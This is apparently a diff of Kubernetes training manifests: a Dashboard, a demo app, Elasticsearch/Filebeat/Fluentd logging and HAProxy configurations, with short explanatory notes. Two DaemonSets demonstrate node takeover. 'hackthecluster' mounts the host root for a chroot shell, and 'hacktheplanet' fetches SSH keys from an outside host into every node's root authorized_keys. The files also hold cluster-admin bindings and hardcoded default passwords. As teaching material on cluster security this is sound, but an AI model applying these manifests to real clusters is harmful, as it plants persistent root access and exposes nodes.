app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: NodePort
ports:
- port: 443
targetPort: https
name: https
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --metrics-provider=none
ports:
- name: https
containerPort: 8443
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
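
Binding cluster-admin to this service account gives the Dashboard full control of the cluster, which is only acceptable in a training environment. To log into the Dashboard, one way to obtain a token for that service account (a sketch assuming kubectl 1.24 or later, where "kubectl create token" is available) is:

    kubectl --namespace=kubernetes-dashboard create token cluster-admin

The resulting JWT can be pasted into the Dashboard's token login field.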

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker
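
These manifests deploy the demo app with one replica per service; only the webui is exposed through a NodePort. A quick way to deploy it and find that port (assuming the manifests are saved as dockercoins.yaml):

    kubectl apply -f dockercoins.yaml
    kubectl get service webui

The NodePort shows up in the PORT(S) column, e.g. 80:3xxxx/TCP.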

View File

@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]
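
Since the cerebro Service is a NodePort, it can be reached on any node; when no node is directly reachable, a port-forward works too (a sketch assuming cerebro was applied in the eck-demo namespace, alongside the demo-es-elastic-user Secret it references):

    kubectl --namespace=eck-demo port-forward service/cerebro 9000:9000

Then browse http://localhost:9000 to reach the cerebro UI.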

View File

@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1
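
The ECK operator creates a demo-es-http Service (the name referenced in the cerebro configuration above) and stores the elastic superuser password in the demo-es-elastic-user Secret. A sketch to check the cluster from a local shell:

    kubectl --namespace=eck-demo port-forward service/demo-es-http 9200 &
    PASSWORD=$(kubectl --namespace=eck-demo get secret demo-es-elastic-user \
               -o 'jsonpath={.data.elastic}' | base64 -d)
    curl -u elastic:$PASSWORD http://localhost:9200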

View File

@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---

View File

@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large.

View File

@@ -3,9 +3,9 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
@@ -19,9 +19,10 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
@@ -32,22 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -56,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -64,12 +66,14 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
@@ -90,87 +94,134 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
namespace: default
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
namespace: default
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
namespace: default
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
namespace: default
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,97 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""
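
To generate a name following that convention from a shell (a sketch assuming GNU date, which supports nanoseconds via %N):

    printf "hello.%x\n" "$(date +%s%N)"

This prints the object name followed by the nanosecond timestamp in hexadecimal, e.g. hello.17e9c8a1b2c3d4e5.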

View File

@@ -1,170 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,4 +1,4 @@
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
@@ -11,4 +11,4 @@ roleRef:
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT
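
With the host filesystem mounted and SYS_CHROOT granted, a shell on the node itself is one kubectl exec away (a sketch; recent kubectl versions accept a daemonset/ prefix and pick one pod of the set):

    kubectl exec -ti daemonset/hackthecluster -- chroot /hostfs sh

This illustrates why mounting / from the host must be tightly controlled.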

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,16 +1,18 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
listen very-basic-load-balancer
frontend the-frontend
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check
# Note: the services above must exist,
# otherwise HAProxy won't start.
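
Before loading such a configuration in the cluster, it can be validated locally with HAProxy's check mode (the -c flag parses the configuration and exits without starting the proxy):

    haproxy -c -f haproxy.cfg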

View File

@@ -9,7 +9,7 @@ spec:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2beta2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1
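
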